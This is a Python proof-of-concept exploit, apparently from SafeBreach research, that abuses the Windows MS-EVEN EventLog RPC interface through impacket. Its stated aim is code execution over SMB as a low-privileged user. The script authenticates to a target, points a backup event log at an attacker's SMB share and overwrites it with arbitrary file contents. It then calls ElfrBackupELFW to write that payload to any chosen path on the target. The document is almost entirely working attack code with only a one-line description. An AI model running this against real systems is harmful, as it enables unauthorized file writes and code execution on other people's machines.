""" @Author: Yarin A. @Company: SafeBreach @Description: This script is using the write primitive given by MS-EVEN, in order to execute code over SMB using low-privileged user. """ import os import shutil import argparse from impacket.dcerpc.v5 import even from impacket.dcerpc.v5.dtypes import RPC_UNICODE_STRING from impacket.dcerpc.v5.transport import DCERPCTransportFactory class Attacker: LOG_MSG_TEMPLATE = r"[+] - {message}" EVENT_LOG_NCACN = r"ncacn_np:{ip}[\pipe\eventlog]" RPC_C_AUTHN_LEVEL_PKT_INTEGRITY = 5 SAMPLE_EVTX_FILENAME = r"Sample.evtx" TEMP_EVTX_FILE_TEMPLATE = r"Temp_{valid_evtx_file}" SHARE_PATH = r"\\{smb_server_ip}\Share\{local_file_path}" def __init__(self, ip, username, password, smb_server_ip): self.smb_server_ip = smb_server_ip self.log("Initializing Connection...") self.connection = DCERPCTransportFactory(self.EVENT_LOG_NCACN.format(ip=ip)) self.log("Authenticating...") self.connection.set_credentials(username, password) self.connection.connect() self.dce = self.connection.get_dce_rpc() self.dce.set_auth_level(self.RPC_C_AUTHN_LEVEL_PKT_INTEGRITY) self.dce.connect() self.log("Binding MS-EVEN Interface...") self.dce.bind(even.MSRPC_UUID_EVEN) def create_rpc_unicode_string(self, regular_string): crafted_unicode_string = RPC_UNICODE_STRING() crafted_unicode_string["Data"] = regular_string crafted_unicode_string.fields["MaximumLength"] += 1 return crafted_unicode_string def create_target_evtx(self, src): file_name = os.path.basename(src) dest_name = self.TEMP_EVTX_FILE_TEMPLATE.format(valid_evtx_file=file_name) shutil.copy(src, dest_name) return dest_name def cleanup(self, file_path): if os.path.exists(file_path): os.remove(file_path) def upload_file(self, local_file_path, remote_file_path, valid_evtx_file_path): temp_valid_evtx_file = self.create_target_evtx(valid_evtx_file_path) file_path_in_share = self.SHARE_PATH.format( smb_server_ip=self.smb_server_ip, local_file_path=os.path.basename(temp_valid_evtx_file), ) unicode_valid_evtx_share_path = self.create_rpc_unicode_string( file_path_in_share ) unicode_remote_path = self.create_rpc_unicode_string(remote_file_path) self.log("Starting upload to {0}".format(remote_file_path)) local_file_path_data = open(local_file_path, "rb").read() with open(temp_valid_evtx_file, "rb+") as valid_evtx_file: handle = even.hElfrOpenBELW(self.dce, unicode_valid_evtx_share_path) valid_evtx_file.seek(0) valid_evtx_file.write(local_file_path_data + b"\x00") valid_evtx_file.flush() even.hElfrBackupELFW(self.dce, handle["LogHandle"], unicode_remote_path) self.log("Done!") def close_connection(self): self.log("Disconnecting...") self.dce.disconnect() def log(self, message): print(self.LOG_MSG_TEMPLATE.format(message=message)) def main(): parser = argparse.ArgumentParser() parser.add_argument("ip_to_attack") parser.add_argument("smb_server_ip") parser.add_argument("username") parser.add_argument("password") parser.add_argument("valid_evtx_file_path") parser.add_argument("local_file_path") parser.add_argument("remote_file_path") args = parser.parse_args() attacker = Attacker( args.ip_to_attack, username=args.username, password=args.password, smb_server_ip=args.smb_server_ip, ) attacker.upload_file( local_file_path=args.local_file_path, remote_file_path=args.remote_file_path, valid_evtx_file_path=args.valid_evtx_file_path, ) attacker.close_connection() if __name__ == "__main__": main()